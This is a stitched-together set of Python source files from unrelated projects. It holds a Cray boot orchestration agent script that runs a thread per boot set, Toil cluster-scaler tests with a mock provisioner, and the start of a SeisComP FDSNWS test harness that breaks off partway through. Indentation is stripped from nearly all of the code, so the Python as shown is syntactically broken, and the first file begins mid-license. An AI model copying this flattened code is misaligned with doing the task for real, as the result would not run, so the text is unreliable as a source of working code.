# copy of this software and associated documentation files (the "Software"),
# to deal in the Software without restriction, including without limitation
# the rights to use, copy, modify, merge, publish, distribute, sublicense,
# and/or sell copies of the Software, and to permit persons to whom the
# Software is furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included
# in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL
# THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR
# OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE,
# ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR
# OTHER DEALINGS IN THE SOFTWARE.
#
import json
import sys
import os
import logging
import threading
from queue import Queue, Empty
from . import TransientException, NontransientException, InvalidInput
from .agent import BootSetAgent
from .bosclient import SessionStatus
from .connection import wait_for_istio_proxy
from .sessiontemplate import TemplateException
LOGGER = logging.getLogger("cray.boa")
# Note; the above configures the project level logger, which is what we
# intend. If additional logging is desired, the root logger can also be
# configured. Configuring only the project level logger allows only cray.boa
# logs to propagate to the event stream. Configuring the root logger allows
# for all related python libraries (requests) to also log to standard out.
# Typically, this is not desired because the requests library is a well
# understood, externally maintained package. We do not expose the ability
# to show logs from other project code bases here. To do that, simply
# uncomment the below:
# LOGGER = logging.getLogger()
VALID_OPERATIONS = ["boot", "configure", "reboot", "shutdown"]
BOOT_SESSION_FILE = "/mnt/boot_session/data.json"
class IterableQueue(Queue):
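    # A Queue that can be drained by iteration: __iter__ yields items with
    # get_nowait() and stops as soon as the queue is empty.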
def __iter__(self):
while True:
try:
yield self.get_nowait()
except Empty:
return
def run():
"""
For each boot set in the session, launch a BOA agent to execute the desired operation
on the nodes in that boot set.
"""
wait_for_istio_proxy()
try:
operation = os.environ["OPERATION"].lower()
if operation not in VALID_OPERATIONS:
raise NontransientException("{} is not a valid operation: {}. Canceling BOA Session.".format(operation, VALID_OPERATIONS))
session_id = os.environ["SESSION_ID"]
session_template_id = os.environ["SESSION_TEMPLATE_ID"]
session_limit = os.environ["SESSION_LIMIT"]
with open(BOOT_SESSION_FILE, "r") as stream:
try:
session_data = json.load(stream)
except Exception as exc:
LOGGER.error("Unable to read file: %s -- Error: %s",
BOOT_SESSION_FILE, exc)
raise
# Create an Agent for each Boot Set
agents = []
boot_sets = []
LOGGER.debug("Starting with session: %s", session_data)
for bs_name in session_data['boot_sets'].keys():
boot_sets.append(bs_name)
agent = BootSetAgent(session_id, session_template_id, bs_name, operation,
session_limit, BOOT_SESSION_FILE)
agents.append(agent)
except KeyError as ke:
raise TemplateException("Missing required variable: %s" % (ke)) from ke
except InvalidInput as err:
raise TemplateException("Template error: %s" % err) from err
LOGGER.info("**********************************")
LOGGER.info("Session: %s", session_id)
LOGGER.info("Operation: %s", operation)
LOGGER.info("Session Template: %s", session_template_id)
LOGGER.info("Session Limit: %s", session_limit)
LOGGER.info("**********************************")
node_list = set()
# Look up which Boot Set a node is in. Keys are nodes. Boot Sets are values.
boot_set_lookup_by_node = {}
node_lookup_by_boot_set = {}
for agent in agents:
node_lookup_by_boot_set[str(agent.boot_set)] = agent.nodes
node_list |= agent.nodes
for node in agent.nodes:
boot_set_lookup_by_node[node] = agent.boot_set
node_list = list(node_list)
# For the duration of running the agent, keep records of state.
with SessionStatus.CreateOrReference(session_id, boot_sets):
exception_queue = IterableQueue()
boa_threads = [threading.Thread(target=agent, kwargs={'queue': exception_queue})
for agent in agents]
_ = [thread.start() for thread in boa_threads]
_ = [thread.join() for thread in boa_threads]
# When all agents are done, reraise exceptions from any of the threads
for exception_fields in exception_queue:
exception_type, exception_value, exception_traceback = exception_fields
raise NontransientException("Unable to apply boot set operation: %s\n%s\n%s"
% (exception_type, exception_value, exception_traceback))
if __name__ == "__main__":
# Format logs for stdout
_log_level = getattr(logging, os.environ.get('LOG_LEVEL', 'INFO').upper(), logging.INFO)
_stream_handler = logging.StreamHandler()
_stream_handler.setLevel(_log_level)
_stream_handler.setFormatter(logging.Formatter("%(asctime)-15s - %(levelname)-7s - %(name)s - %(message)s"))
LOGGER.addHandler(_stream_handler)
LOGGER.setLevel(_log_level)
LOGGER.debug("BOA starting")
try:
run()
except TransientException:
LOGGER.exception("A recoverable error has been detected; Boot Orchestration Agent is now "
"exiting with a non-zero response to allow for rescheduling. ")
sys.exit(1)
except NontransientException:
LOGGER.exception("Fatal conditions have been detected with this run of Boot Orchestration "
"that are not expected to be recoverable through additional iterations. "
"The application is exiting with a zero status to prevent job rescheduling.")
sys.exit(0)
except Exception as err:
LOGGER.exception("An unanticipated exception occurred during launch: %s; terminating attempt "
"with one for perceived transient error. The following stack should be "
"captured and filed as a bug so that the exception can be classified as "
"recoverable or non-recoverable.", err)
sys.exit(1)
LOGGER.info("BOA completed requested operation.")
|
clusterScalerTest.py
|
# Copyright (C) 2015-2018 Regents of the University of California
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from __future__ import absolute_import
from __future__ import division
from builtins import map
from builtins import object
from builtins import range
from past.utils import old_div
import time
import datetime
from contextlib import contextmanager
from threading import Thread, Event
import logging
import random
import uuid
from collections import defaultdict
from mock import MagicMock
# Python 3 compatibility imports
from six.moves.queue import Empty, Queue
from six import iteritems
from toil.job import JobNode, Job
from toil.lib.humanize import human2bytes as h2b
from toil.test import ToilTest, slow
from toil.batchSystems.abstractBatchSystem import (AbstractScalableBatchSystem,
NodeInfo,
AbstractBatchSystem)
from toil.provisioners.node import Node
from toil.provisioners.abstractProvisioner import AbstractProvisioner, Shape
from toil.provisioners.clusterScaler import (ClusterScaler,
ScalerThread,
BinPackedFit,
NodeReservation)
from toil.common import Config, defaultTargetTime
logger = logging.getLogger(__name__)
# simplified c4.8xlarge (preemptable)
c4_8xlarge_preemptable = Shape(wallTime=3600,
memory=h2b('60G'),
cores=36,
disk=h2b('100G'),
preemptable=True)
# simplified c4.8xlarge (non-preemptable)
c4_8xlarge = Shape(wallTime=3600,
memory=h2b('60G'),
cores=36,
disk=h2b('100G'),
preemptable=False)
# simplified r3.8xlarge (non-preemptable)
r3_8xlarge = Shape(wallTime=3600,
memory=h2b('260G'),
cores=32,
disk=h2b('600G'),
preemptable=False)
# simplified t2.micro (non-preemptable)
t2_micro = Shape(wallTime=3600,
memory=h2b('1G'),
cores=1,
disk=h2b('8G'),
preemptable=False)
class BinPackingTest(ToilTest):
def setUp(self):
self.nodeShapes = [c4_8xlarge_preemptable, r3_8xlarge]
self.bpf = BinPackedFit(self.nodeShapes)
def testPackingOneShape(self):
"""Pack one shape and check that the resulting reservations look sane."""
self.bpf.nodeReservations[c4_8xlarge_preemptable] = [NodeReservation(c4_8xlarge_preemptable)]
self.bpf.addJobShape(Shape(wallTime=1000,
cores=2,
memory=h2b('1G'),
disk=h2b('2G'),
preemptable=True))
self.assertEqual(self.bpf.nodeReservations[r3_8xlarge], [])
self.assertEqual([x.shapes() for x in self.bpf.nodeReservations[c4_8xlarge_preemptable]],
[[Shape(wallTime=1000,
memory=h2b('59G'),
cores=34,
disk=h2b('98G'),
preemptable=True),
Shape(wallTime=2600,
memory=h2b('60G'),
cores=36,
disk=h2b('100G'),
preemptable=True)]])
def testSorting(self):
"""
Test that sorting is correct: preemptable, then memory, then cores, then disk,
then wallTime.
"""
shapeList = [c4_8xlarge_preemptable, r3_8xlarge, c4_8xlarge, c4_8xlarge,
t2_micro, t2_micro, c4_8xlarge, r3_8xlarge, r3_8xlarge, t2_micro]
shapeList.sort()
assert shapeList == [c4_8xlarge_preemptable,
t2_micro, t2_micro, t2_micro,
c4_8xlarge, c4_8xlarge, c4_8xlarge,
r3_8xlarge, r3_8xlarge, r3_8xlarge]
def testAddingInitialNode(self):
"""Pack one shape when no nodes are available and confirm that we fit one node properly."""
self.bpf.addJobShape(Shape(wallTime=1000,
cores=2,
memory=h2b('1G'),
disk=h2b('2G'),
preemptable=True))
self.assertEqual([x.shapes() for x in self.bpf.nodeReservations[c4_8xlarge_preemptable]],
[[Shape(wallTime=1000,
memory=h2b('59G'),
cores=34,
disk=h2b('98G'),
preemptable=True),
Shape(wallTime=2600,
memory=h2b('60G'),
cores=36,
disk=h2b('100G'),
preemptable=True)]])
def testLowTargetTime(self):
"""
Test that a low targetTime (0) parallelizes jobs aggressively (1000 queued jobs require
1000 nodes).
Ideally, low targetTime means: Start quickly and maximize parallelization after the
cpu/disk/mem have been packed.
Disk/cpu/mem packing is prioritized first, so we set job resource reqs so that each
t2.micro (1 cpu/8G disk/1G RAM) can only run one job at a time with its resources.
Each job is parametrized to take 300 seconds, so (the minimum of) 1 of them should fit into
each node's 0 second window, so we expect 1000 nodes.
"""
allocation = self.run1000JobsOnMicros(jobCores=1,
jobMem=h2b('1G'),
jobDisk=h2b('1G'),
jobTime=300,
globalTargetTime=0)
self.assertEqual(allocation, {t2_micro: 1000})
def testHighTargetTime(self):
"""
Test that a high targetTime (3600 seconds) maximizes packing within the targetTime.
Ideally, high targetTime means: Maximize packing within the targetTime after the
cpu/disk/mem have been packed.
Disk/cpu/mem packing is prioritized first, so we set job resource reqs so that each
t2.micro (1 cpu/8G disk/1G RAM) can only run one job at a time with its resources.
Each job is parametrized to take 300 seconds, so 12 of them should fit into each node's
3600 second window. 1000/12 = 83.33, so we expect 84 nodes.
"""
allocation = self.run1000JobsOnMicros(jobCores=1,
jobMem=h2b('1G'),
jobDisk=h2b('1G'),
jobTime=300,
globalTargetTime=3600)
self.assertEqual(allocation, {t2_micro: 84})
def testZeroResourceJobs(self):
"""
Test that jobs requiring zero cpu/disk/mem pack first, regardless of targetTime.
Disk/cpu/mem packing is prioritized first, so we set job resource reqs so that each
t2.micro (1 cpu/8G disk/1G RAM) can run a seemingly infinite number of jobs with its
resources.
        Since all jobs should pack cpu/disk/mem-wise on a t2.micro, we expect only one t2.micro to
        be provisioned. If the jobs required non-zero resources, as in testLowTargetTime, 1000
        t2.micros would be launched instead.
"""
allocation = self.run1000JobsOnMicros(jobCores=0,
jobMem=0,
jobDisk=0,
jobTime=300,
globalTargetTime=0)
self.assertEqual(allocation, {t2_micro: 1})
def testLongRunningJobs(self):
"""
Test that jobs with long run times (especially service jobs) are aggressively parallelized.
This is important, because services are one case where the degree of parallelization
really, really matters. If you have multiple services, they may all need to be running
simultaneously before any real work can be done.
Despite setting globalTargetTime=3600, this should launch 1000 t2.micros because each job's
estimated runtime (30000 seconds) extends well beyond 3600 seconds.
"""
allocation = self.run1000JobsOnMicros(jobCores=1,
jobMem=h2b('1G'),
jobDisk=h2b('1G'),
jobTime=30000,
globalTargetTime=3600)
self.assertEqual(allocation, {t2_micro: 1000})
def run1000JobsOnMicros(self, jobCores, jobMem, jobDisk, jobTime, globalTargetTime):
"""Test packing 1000 jobs on t2.micros. Depending on the targetTime and resources,
these should pack differently.
"""
nodeShapes = [t2_micro]
bpf = BinPackedFit(nodeShapes, targetTime=globalTargetTime)
for _ in range(1000):
bpf.addJobShape(Shape(wallTime=jobTime,
memory=jobMem,
cores=jobCores,
disk=jobDisk,
preemptable=False))
return bpf.getRequiredNodes()
def testPathologicalCase(self):
"""Test a pathological case where only one node can be requested to fit months' worth of jobs.
If the reservation is extended to fit a long job, and the
bin-packer naively searches through all the reservation slices
to find the first slice that fits, it will happily assign the
first slot that fits the job, even if that slot occurs days in
the future.
"""
# Add one job that partially fills an r3.8xlarge for 1000 hours
self.bpf.addJobShape(Shape(wallTime=3600000,
memory=h2b('10G'),
cores=0,
disk=h2b('10G'),
preemptable=False))
for _ in range(500):
# Add 500 CPU-hours worth of jobs that fill an r3.8xlarge
self.bpf.addJobShape(Shape(wallTime=3600,
memory=h2b('26G'),
cores=32,
disk=h2b('60G'),
preemptable=False))
# Hopefully we didn't assign just one node to cover all those jobs.
self.assertNotEqual(self.bpf.getRequiredNodes(), {r3_8xlarge: 1, c4_8xlarge_preemptable: 0})
class ClusterScalerTest(ToilTest):
def setUp(self):
super(ClusterScalerTest, self).setUp()
self.config = Config()
self.config.targetTime = 1800
self.config.nodeTypes = ['r3.8xlarge', 'c4.8xlarge:0.6']
# Set up a stub provisioner with some nodeTypes and nodeShapes.
        self.provisioner = MagicMock()
self.provisioner.nodeTypes = ['r3.8xlarge', 'c4.8xlarge']
self.provisioner.nodeShapes = [r3_8xlarge,
c4_8xlarge_preemptable]
self.provisioner.setStaticNodes = lambda _, __: None
self.provisioner.retryPredicate = lambda _: False
self.leader = MockBatchSystemAndProvisioner(self.config, 1)
def testMaxNodes(self):
"""
Set the scaler to be very aggressive, give it a ton of jobs, and
make sure it doesn't go over maxNodes.
"""
self.config.targetTime = 1
self.config.betaInertia = 0.0
self.config.maxNodes = [2, 3]
scaler = ClusterScaler(self.provisioner, self.leader, self.config)
jobShapes = [Shape(wallTime=3600,
cores=2,
memory=h2b('1G'),
disk=h2b('2G'),
preemptable=True)] * 1000
jobShapes.extend([Shape(wallTime=3600,
cores=2,
memory=h2b('1G'),
disk=h2b('2G'),
preemptable=False)] * 1000)
estimatedNodeCounts = scaler.getEstimatedNodeCounts(jobShapes, defaultdict(int))
self.assertEqual(estimatedNodeCounts[r3_8xlarge], 2)
self.assertEqual(estimatedNodeCounts[c4_8xlarge_preemptable], 3)
def testMinNodes(self):
"""
Without any jobs queued, the scaler should still estimate "minNodes" nodes.
"""
self.config.betaInertia = 0.0
self.config.minNodes = [2, 3]
scaler = ClusterScaler(self.provisioner, self.leader, self.config)
jobShapes = []
estimatedNodeCounts = scaler.getEstimatedNodeCounts(jobShapes, defaultdict(int))
self.assertEqual(estimatedNodeCounts[r3_8xlarge], 2)
self.assertEqual(estimatedNodeCounts[c4_8xlarge_preemptable], 3)
def testPreemptableDeficitResponse(self):
"""
When a preemptable deficit was detected by a previous run of the
loop, the scaler should add non-preemptable nodes to
compensate in proportion to preemptableCompensation.
"""
self.config.targetTime = 1
self.config.betaInertia = 0.0
self.config.maxNodes = [10, 10]
# This should mean that one non-preemptable node is launched
# for every two preemptable nodes "missing".
self.config.preemptableCompensation = 0.5
# In this case, we want to explicitly set up the config so
# that we can have preemptable and non-preemptable nodes of
# the same type. That is the only situation where
# preemptableCompensation applies.
self.config.nodeTypes = ['c4.8xlarge:0.6', 'c4.8xlarge']
self.provisioner.nodeTypes = ['c4.8xlarge', 'c4.8xlarge']
self.provisioner.nodeShapes = [c4_8xlarge_preemptable,
c4_8xlarge]
scaler = ClusterScaler(self.provisioner, self.leader, self.config)
# Simulate a situation where a previous run caused a
# "deficit" of 5 preemptable nodes (e.g. a spot bid was lost)
scaler.preemptableNodeDeficit['c4.8xlarge'] = 5
# Add a bunch of preemptable jobs (so the bin-packing
# estimate for the non-preemptable node should still be 0)
jobShapes = [Shape(wallTime=3600,
cores=2,
memory=h2b('1G'),
disk=h2b('2G'),
preemptable=True)] * 1000
estimatedNodeCounts = scaler.getEstimatedNodeCounts(jobShapes, defaultdict(int))
# We don't care about the estimated size of the preemptable
# nodes. All we want to know is if we responded to the deficit
# properly: 0.5 * 5 (preemptableCompensation * the deficit) = 3 (rounded up).
self.assertEqual(estimatedNodeCounts[self.provisioner.nodeShapes[1]], 3)
def testPreemptableDeficitIsSet(self):
"""
Make sure that updateClusterSize sets the preemptable deficit if
it can't launch preemptable nodes properly. That way, the
deficit can be communicated to the next run of
estimateNodeCount.
"""
# Mock out addNodes. We want to pretend it had trouble
# launching all 5 nodes, and could only launch 3.
self.provisioner.addNodes = MagicMock(return_value=3)
# Pretend there are no nodes in the cluster right now
self.provisioner.getProvisionedWorkers = MagicMock(return_value=[])
# In this case, we want to explicitly set up the config so
# that we can have preemptable and non-preemptable nodes of
# the same type. That is the only situation where
# preemptableCompensation applies.
self.config.nodeTypes = ['c4.8xlarge:0.6', 'c4.8xlarge']
self.provisioner.nodeTypes = ['c4.8xlarge', 'c4.8xlarge']
self.provisioner.nodeShapes = [c4_8xlarge_preemptable,
c4_8xlarge]
scaler = ClusterScaler(self.provisioner, self.leader, self.config)
estimatedNodeCounts = {c4_8xlarge_preemptable: 5, c4_8xlarge: 0}
scaler.updateClusterSize(estimatedNodeCounts)
self.assertEqual(scaler.preemptableNodeDeficit['c4.8xlarge'], 2)
self.provisioner.addNodes.assert_called_once()
# OK, now pretend this is a while later, and actually launched
# the nodes properly. The deficit should disappear
self.provisioner.addNodes = MagicMock(return_value=5)
scaler.updateClusterSize(estimatedNodeCounts)
self.assertEqual(scaler.preemptableNodeDeficit['c4.8xlarge'], 0)
def testBetaInertia(self):
# This is really high, but makes things easy to calculate.
self.config.betaInertia = 0.5
scaler = ClusterScaler(self.provisioner, self.leader, self.config)
# OK, smoothing things this much should get us 50% of the way to 100.
self.assertEqual(scaler.smoothEstimate(c4_8xlarge_preemptable, 100), 50)
# Now we should be at 75%.
self.assertEqual(scaler.smoothEstimate(c4_8xlarge_preemptable, 100), 75)
# We should eventually converge on our estimate as long as betaInertia is below 1.
for _ in range(1000):
scaler.smoothEstimate(c4_8xlarge_preemptable, 100)
self.assertEqual(scaler.smoothEstimate(c4_8xlarge_preemptable, 100), 100)
class ScalerThreadTest(ToilTest):
def _testClusterScaling(self, config, numJobs, numPreemptableJobs, jobShape):
"""
Test the ClusterScaler class with different patterns of job creation. Tests ascertain that
autoscaling occurs and that all the jobs are run.
"""
        # First do simple test of creating 100 preemptable and non-preemptable jobs and check the
# jobs are completed okay, then print the amount of worker time expended and the total
# number of worker nodes used.
mock = MockBatchSystemAndProvisioner(config, secondsPerJob=2.0)
mock.start()
clusterScaler = ScalerThread(mock, mock, config)
clusterScaler.start()
try:
# Add 100 jobs to complete
list(map(lambda x: mock.addJob(jobShape=jobShape),
list(range(numJobs))))
list(map(lambda x: mock.addJob(jobShape=jobShape, preemptable=True),
list(range(numPreemptableJobs))))
# Add some completed jobs
for preemptable in (True, False):
if preemptable and numPreemptableJobs > 0 or not preemptable and numJobs > 0:
# Add 1000 random jobs
for _ in range(1000):
x = mock.getNodeShape(nodeType=jobShape)
iJ = JobNode(jobStoreID=1,
requirements=dict(
memory=random.choice(list(range(1, x.memory))),
cores=random.choice(list(range(1, x.cores))),
disk=random.choice(list(range(1, x.disk))),
preemptable=preemptable),
command=None,
jobName='testClusterScaling', unitName='')
clusterScaler.addCompletedJob(iJ, random.choice(list(range(1, x.wallTime))))
startTime = time.time()
# Wait while the cluster processes the jobs
while (mock.getNumberOfJobsIssued(preemptable=False) > 0
or mock.getNumberOfJobsIssued(preemptable=True) > 0
or mock.getNumberOfNodes() > 0 or mock.getNumberOfNodes(preemptable=True) > 0):
logger.debug("Running, non-preemptable queue size: %s, non-preemptable workers: %s, "
"preemptable queue size: %s, preemptable workers: %s" %
(mock.getNumberOfJobsIssued(preemptable=False),
mock.getNumberOfNodes(preemptable=False),
mock.getNumberOfJobsIssued(preemptable=True),
mock.getNumberOfNodes(preemptable=True)))
clusterScaler.check()
time.sleep(0.5)
logger.debug("We waited %s for cluster to finish" % (time.time() - startTime))
finally:
clusterScaler.shutdown()
mock.shutDown()
# Print some info about the autoscaling
logger.debug("Total-jobs: %s: Max-workers: %s, "
"Total-worker-time: %s, Worker-time-per-job: %s" %
(mock.totalJobs, sum(mock.maxWorkers.values()),
mock.totalWorkerTime,
old_div(mock.totalWorkerTime, mock.totalJobs) if mock.totalJobs > 0 else 0.0))
@slow
def testClusterScaling(self):
"""
Test scaling for a batch of non-preemptable jobs and no preemptable jobs (makes debugging
easier).
"""
config = Config()
# Make defaults dummy values
config.defaultMemory = 1
config.defaultCores = 1
config.defaultDisk = 1
# No preemptable nodes/jobs
config.maxPreemptableNodes = [] # No preemptable nodes
# Non-preemptable parameters
config.nodeTypes = [Shape(20, 10, 10, 10, False)]
config.minNodes = [0]
config.maxNodes = [10]
# Algorithm parameters
config.targetTime = defaultTargetTime
config.betaInertia = 0.1
config.scaleInterval = 3
self._testClusterScaling(config, numJobs=100, numPreemptableJobs=0,
jobShape=config.nodeTypes[0])
@slow
def testClusterScalingMultipleNodeTypes(self):
smallNode = Shape(20, 5, 10, 10, False)
mediumNode = Shape(20, 10, 10, 10, False)
largeNode = Shape(20, 20, 10, 10, False)
numJobs = 100
config = Config()
# Make defaults dummy values
config.defaultMemory = 1
config.defaultCores = 1
config.defaultDisk = 1
# No preemptable nodes/jobs
config.preemptableNodeTypes = []
config.minPreemptableNodes = []
config.maxPreemptableNodes = [] # No preemptable nodes
# Make sure the node types don't have to be ordered
config.nodeTypes = [largeNode, smallNode, mediumNode]
config.minNodes = [0, 0, 0]
config.maxNodes = [10, 10] # test expansion of this list
# Algorithm parameters
config.targetTime = defaultTargetTime
config.betaInertia = 0.1
config.scaleInterval = 3
mock = MockBatchSystemAndProvisioner(config, secondsPerJob=2.0)
clusterScaler = ScalerThread(mock, mock, config)
clusterScaler.start()
mock.start()
try:
# Add small jobs
list(map(lambda x: mock.addJob(jobShape=smallNode), list(range(numJobs))))
list(map(lambda x: mock.addJob(jobShape=mediumNode), list(range(numJobs))))
# Add medium completed jobs
for i in range(1000):
iJ = JobNode(jobStoreID=1,
requirements=dict(
memory=random.choice(range(smallNode.memory, mediumNode.memory)),
cores=mediumNode.cores,
disk=largeNode.cores,
preemptable=False),
command=None,
jobName='testClusterScaling', unitName='')
clusterScaler.addCompletedJob(iJ, random.choice(range(1, 10)))
while mock.getNumberOfJobsIssued() > 0 or mock.getNumberOfNodes() > 0:
logger.info("%i nodes currently provisioned" % mock.getNumberOfNodes())
# Make sure there are no large nodes
self.assertEqual(mock.getNumberOfNodes(nodeType=largeNode), 0)
clusterScaler.check()
time.sleep(0.5)
finally:
clusterScaler.shutdown()
mock.shutDown()
# Make sure jobs ran on both the small and medium node types
self.assertTrue(mock.totalJobs > 0)
self.assertTrue(mock.maxWorkers[smallNode] > 0)
self.assertTrue(mock.maxWorkers[mediumNode] > 0)
self.assertEqual(mock.maxWorkers[largeNode], 0)
@slow
def testClusterScalingWithPreemptableJobs(self):
"""
Test scaling simultaneously for a batch of preemptable and non-preemptable jobs.
"""
config = Config()
jobShape = Shape(20, 10, 10, 10, False)
preemptableJobShape = Shape(20, 10, 10, 10, True)
# Make defaults dummy values
config.defaultMemory = 1
config.defaultCores = 1
config.defaultDisk = 1
# non-preemptable node parameters
config.nodeTypes = [jobShape, preemptableJobShape]
config.minNodes = [0, 0]
config.maxNodes = [10, 10]
# Algorithm parameters
config.targetTime = defaultTargetTime
config.betaInertia = 0.9
config.scaleInterval = 3
self._testClusterScaling(config, numJobs=100, numPreemptableJobs=100, jobShape=jobShape)
# noinspection PyAbstractClass
class MockBatchSystemAndProvisioner(AbstractScalableBatchSystem, AbstractProvisioner):
"""
Mimics a job batcher, provisioner and scalable batch system
"""
def __init__(self, config, secondsPerJob):
super(MockBatchSystemAndProvisioner, self).__init__('clusterName')
# To mimic parallel preemptable and non-preemptable queues
# for jobs we create two parallel instances of the following class
self.config = config
self.secondsPerJob = secondsPerJob
self.provisioner = self
self.batchSystem = self
self.nodeTypes = config.nodeTypes
self.nodeShapes = self.nodeTypes
self.nodeShapes.sort()
self.jobQueue = Queue()
self.updatedJobsQueue = Queue()
self.jobBatchSystemIDToIssuedJob = {}
self.totalJobs = 0 # Count of total jobs processed
self.totalWorkerTime = 0.0 # Total time spent in worker threads
self.toilMetrics = None
self.nodesToWorker = {} # Map from Node to instances of the Worker class
self.workers = {nodeShape: [] for nodeShape in
self.nodeShapes} # Instances of the Worker class
self.maxWorkers = {nodeShape: 0 for nodeShape in
self.nodeShapes} # Maximum number of workers
self.running = False
self.leaderThread = Thread(target=self._leaderFn)
def start(self):
self.running = True
self.leaderThread.start()
def shutDown(self):
self.running = False
self.leaderThread.join()
# Stub out all AbstractBatchSystem methods since they are never called
for name, value in iteritems(AbstractBatchSystem.__dict__):
if getattr(value, '__isabstractmethod__', False):
exec('def %s(): pass' % name)
# Without this, the class would end up with .name and .value attributes
del name, value
# AbstractScalableBatchSystem methods
def nodeInUse(self, nodeIP):
return False
def ignoreNode(self, nodeAddress):
pass
def unignoreNode(self, nodeAddress):
pass
@contextmanager
def nodeFiltering(self, filter):
nodes = self.getProvisionedWorkers(preemptable=True,
nodeType=None) + self.getProvisionedWorkers(
preemptable=False, nodeType=None)
yield nodes
# AbstractProvisioner methods
def getProvisionedWorkers(self, nodeType=None, preemptable=None):
"""
Returns a list of Node objects, each representing a worker node in the cluster
:param preemptable: If True only return preemptable nodes else return non-preemptable nodes
:return: list of Node
"""
nodesToWorker = self.nodesToWorker
if nodeType:
return [node for node in nodesToWorker if node.nodeType == nodeType]
else:
return list(nodesToWorker.keys())
def terminateNodes(self, nodes):
self._removeNodes(nodes)
def remainingBillingInterval(self, node):
pass
def addJob(self, jobShape, preemptable=False):
"""
Add a job to the job queue
"""
self.totalJobs += 1
jobID = uuid.uuid4()
self.jobBatchSystemIDToIssuedJob[jobID] = Job(memory=jobShape.memory,
cores=jobShape.cores, disk=jobShape.disk,
preemptable=preemptable)
self.jobQueue.put(jobID)
# JobBatcher functionality
def getNumberOfJobsIssued(self, preemptable=None):
if preemptable is not None:
jobList = [job for job in list(self.jobQueue.queue) if
self.jobBatchSystemIDToIssuedJob[job].preemptable == preemptable]
return len(jobList)
else:
return self.jobQueue.qsize()
def getJobs(self):
return self.jobBatchSystemIDToIssuedJob.values()
# AbstractScalableBatchSystem functionality
def getNodes(self, preemptable=False, timeout=None):
nodes = dict()
for node in self.nodesToWorker:
if node.preemptable == preemptable:
worker = self.nodesToWorker[node]
nodes[node.privateIP] = NodeInfo(coresTotal=0, coresUsed=0, requestedCores=1,
memoryTotal=0, memoryUsed=0, requestedMemory=1,
workers=1 if worker.busyEvent.is_set() else 0)
return nodes
# AbstractProvisioner functionality
def addNodes(self, nodeType, numNodes, preemptable):
self._addNodes(numNodes=numNodes, nodeType=nodeType, preemptable=preemptable)
return self.getNumberOfNodes(nodeType=nodeType, preemptable=preemptable)
def getNodeShape(self, nodeType, preemptable=False):
# Assume node shapes and node types are the same thing for testing
return nodeType
def getWorkersInCluster(self, nodeShape):
return self.workers[nodeShape]
def launchCluster(self, leaderNodeType, keyName, userTags=None,
vpcSubnet=None, leaderStorage=50, nodeStorage=50, botoPath=None, **kwargs):
pass
def destroyCluster(self):
pass
def getLeader(self):
pass
def _leaderFn(self):
while self.running:
updatedJobID = None
try:
updatedJobID = self.updatedJobsQueue.get(timeout=1.0)
except Empty:
continue
if updatedJobID:
del self.jobBatchSystemIDToIssuedJob[updatedJobID]
time.sleep(0.1)
def _addNodes(self, numNodes, nodeType, preemptable=False):
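        # Create numNodes fake nodes, each backed by a Worker thread that pulls
        # jobs off the shared queue, and track the per-shape worker counts.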
nodeShape = self.getNodeShape(nodeType=nodeType, preemptable=preemptable)
class Worker(object):
def __init__(self, jobQueue, updatedJobsQueue, secondsPerJob):
self.busyEvent = Event()
self.stopEvent = Event()
def workerFn():
while True:
if self.stopEvent.is_set():
return
try:
jobID = jobQueue.get(timeout=1.0)
except Empty:
continue
updatedJobsQueue.put(jobID)
self.busyEvent.set()
time.sleep(secondsPerJob)
self.busyEvent.clear()
self.startTime = time.time()
self.worker = Thread(target=workerFn)
self.worker.start()
def stop(self):
self.stopEvent.set()
self.worker.join()
return time.time() - self.startTime
for _ in range(numNodes):
node = Node('127.0.0.1', uuid.uuid4(), 'testNode', datetime.datetime.now().isoformat()+'Z', nodeType=nodeType,
preemptable=preemptable)
self.nodesToWorker[node] = Worker(self.jobQueue, self.updatedJobsQueue, self.secondsPerJob)
self.workers[nodeShape].append(self.nodesToWorker[node])
self.maxWorkers[nodeShape] = max(self.maxWorkers[nodeShape], len(self.workers[nodeShape]))
def _removeNodes(self, nodes):
logger.info("Removing nodes. %s workers and %s to terminate.", len(self.nodesToWorker),
len(nodes))
for node in nodes:
logger.info("removed node")
try:
nodeShape = self.getNodeShape(node.nodeType, node.preemptable)
worker = self.nodesToWorker.pop(node)
self.workers[nodeShape].pop()
self.totalWorkerTime += worker.stop()
except KeyError:
# Node isn't our responsibility
pass
def getNumberOfNodes(self, nodeType=None, preemptable=None):
if nodeType:
nodeShape = self.getNodeShape(nodeType=nodeType, preemptable=preemptable)
return len(self.workers[nodeShape])
else:
return len(self.nodesToWorker)
|
fdsnwstest.py
|
#!/usr/bin/env python
###############################################################################
# Copyright (C) 2013-2014 by gempa GmbH
#
# Author: Stephan Herrnkind
# Email: herrnkind@gempa.de
###############################################################################
from __future__ import absolute_import, division, print_function
import os
import requests
import signal
import socket
import subprocess
import sys
import time
import traceback
from threading import Thread
if sys.version_info[0] < 3:
from Queue import Queue
else:
from queue import Queue
from datetime import datetime, timedelta
from fdsnws.utils import py3bstr
###############################################################################
class FDSNWSTest:
#--------------------------------------------------------------------------
def __init__(self, port=8080):
self.port = port
self.url = 'http://localhost:{}/fdsnws'.format(self.port)
self.service = None
self.rootdir = os.environ.get('SEISCOMP_ROOT')
self.sharedir = '{}/share/fdsnws'.format(self.rootdir)
#--------------------------------------------------------------------------
def __call__(self):
if not self._startService():
return 1
try:
self.test()
except Exception as e:
traceback.print_exc()
self._stopService()
return 1
self._stopService()
return 0
#--------------------------------------------------------------------------
def _waitForSocket(self, timeout=10):
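        # Poll the TCP port with connect_ex() every 0.2 s until it accepts
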